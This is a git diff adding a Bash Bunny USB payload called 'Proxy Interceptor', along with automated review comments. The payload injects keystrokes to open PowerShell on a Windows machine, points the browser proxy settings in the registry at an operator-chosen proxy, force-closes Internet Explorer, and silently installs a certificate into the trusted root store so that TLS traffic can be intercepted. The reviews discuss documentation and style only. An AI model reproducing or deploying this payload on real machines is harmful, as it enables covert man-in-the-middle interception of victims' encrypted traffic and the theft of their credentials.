diff --git a/payloads/library/Proxy_Interceptor/ImportCert.ps1 b/payloads/library/Proxy_Interceptor/ImportCert.ps1
new file mode 100644
index 00000000..d4612cb0
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/ImportCert.ps1
@@ -0,0 +1,6 @@
+#Import variables from vars.ps1 for use.
+. .\vars.ps1
+
+#Add certificate to certificate store
+$certFile = ( Get-ChildItem -Path $certName )
+$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
\ No newline at end of file
diff --git a/payloads/library/Proxy_Interceptor/README.md b/payloads/library/Proxy_Interceptor/README.md
new file mode 100644
index 00000000..e8976216
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/README.md
@@ -0,0 +1,30 @@
+# Proxy Interceptor for Bash Bunny
+
+Author: NightStalker
+
+Version: 1.0
+
+## Description
+
+This payload will enable a proxy and import an SSL certificate to a Windows
+computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
+The script uses a combination of Ducky Code and PowerShell.
+
+*Note: Currently no falure LED, if remains red for more than 60 seconds
+script failed. Will build checks in later version.
+
+## Requirements
+
+Certificate needs to be in .pem format and in the root switch directory with
+payload.txt, set the certificate and proxy information in the vars.ps1 file.
+
+## STATUS
+
+| LED | Status |
+| ---------------- | ------------------------------------- |
+| White (blinking) | Script Running. |
+| Purple (blinging)| Script Complete. |
+
+## Discussion
+
+https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/
diff --git a/payloads/library/Proxy_Interceptor/SetProxy.ps1 b/payloads/library/Proxy_Interceptor/SetProxy.ps1
new file mode 100644
index 00000000..74458979
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/SetProxy.ps1
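Review bot: ImportCert.ps1 adds the certificate to `cert:\CurrentUser\Root`, a persistent trust-root change, and neither its header comment nor the README's Requirements section says so; the same gap applies to the execution-policy and ProxyEnable/ProxyServer changes made in SetProxy.ps1. Anyone running this against a lab machine needs that list to restore the machine afterwards, and the README's "script failed" note gives no way to tell which of the steps completed. Suggest a header comment such as `# Persistent change: installs $certName into the CurrentUser Root store; this payload does not remove it.` and a short "Changes made to the target" section in README.md listing the certificate, the registry values and the execution policy.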
@@ -0,0 +1,19 @@
+#Import variables from vars.ps1 for use.
+. .\vars.ps1
+
+#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
+Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
+$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
+if ($ieProcess) {
+ $ieProcess.CloseMainWindow()
+Sleep 5
+if (!$ieProcess.HasExited) {
+ $ieProcess | Stop-Process -Force
+ }
+}
+Remove-Variable ieProcess
+
+#Change the proxy settings in the registry
+$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
+Set-ItemProperty -path $regKey ProxyEnable -value 1
+Set-ItemProperty -path $regKey ProxyServer -value $proxyVal
\ No newline at end of file
diff --git a/payloads/library/Proxy_Interceptor/cert.pem b/payloads/library/Proxy_Interceptor/cert.pem
new file mode 100644
index 00000000..c0bfbec0
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/cert.pem
@@ -0,0 +1,4 @@
+-----BEGIN CERTIFICATE-----
+REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE
+FROM PROXY FOR SSL INTERCEPTION.
+-----END CERTIFICATE-----
diff --git a/payloads/library/Proxy_Interceptor/payload.txt b/payloads/library/Proxy_Interceptor/payload.txt
new file mode 100644
index 00000000..b5e180f9
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/payload.txt
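Review bot: The `if ($ieProcess)` block in SetProxy.ps1 is indented inconsistently as rendered here — `Sleep 5` and the nested `if (!$ieProcess.HasExited)` sit at the same column as the outer `if`, and the two closing braces do not line up — so the scope of the nested check is hard to read at a glance; if the collapse of this diff lost the original indentation, ignore this part. `Sleep` is only an alias; spell out the cmdlet as `Start-Sleep -Seconds 5` for clarity. The header comment also misspells Internet Explorer (`Explorere`).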
@@ -0,0 +1,65 @@
+#!/bin/bash
+#
+# Title: Proxy Interceptor
+# Author: NightStalker
+# Version: 1.0
+#
+#This payload will enable a proxy and import an SSL certificate to a Windows
+#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
+#The script uses a combination of Ducky Code and PowerShell.
+#
+# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt
+#
+# Red Blinking.............Running Payload
+# Purple Blinking .........Payload Completed
+
+#Set Red LED to indicate Starting of Script
+LED R 50
+
+#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
+ATTACKMODE HID STORAGE
+
+#Import Bunny Helpers
+source bunny_helpers.sh
+
+#Start of Script
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING POWERSHELL
+Q ENTER
+Q DELAY 100
+
+#Change to the directory of the Bunny with the proper switch location
+Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name
+Q ENTER
+Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\'
+Q ENTER
+Q STRING cd \$absPath
+Q ENTER
+Q DELAY 500
+
+#Set the proxy in the internet settings in the registry (For IE and Chrome).
+Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
+Q ENTER
+Q DELAY 500
+
+#Import the certificate to the computer (for IE and Chrome).
+Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')"
+Q ENTER
+Q DELAY 1000
+Q ALT y
+Q DELAY 500
+
+#Unmount the USB Drive.
+Q STRING \$driveEject = New-Object -comObject Shell.Application
+Q ENTER
+Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\)
+Q ENTER
+Q DELAY 500
+Q ALT t
+Q DELAY 500
+Q STRING EXIT
+Q ENTER
+sync
+LED R B 100
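Review bot: The LED documentation in this payload disagrees with the README: the header comment says `# Red Blinking.............Running Payload` and `# Purple Blinking .........Payload Completed`, while the README's STATUS table lists White (blinking) for running, and the code itself issues `LED R 50` at the start and `LED R B 100` at the end. Whatever colours those arguments produce on the firmware in use, the header and the README cannot both be right, so one of them should be corrected to match the other (and the `#Set Red LED` comment above `LED R 50` suggests the header is the accurate one). The header comment also has a typo, `varaibles`, and the README has `blinging` and `falure`.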
diff --git a/payloads/library/Proxy_Interceptor/vars.ps1 b/payloads/library/Proxy_Interceptor/vars.ps1
new file mode 100644
index 00000000..9f2ffa59
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/vars.ps1
@@ -0,0 +1,3 @@
+#Set variables for use in payload.
+$proxyVal = "proxyip:port"
+$certName = "cert.pem"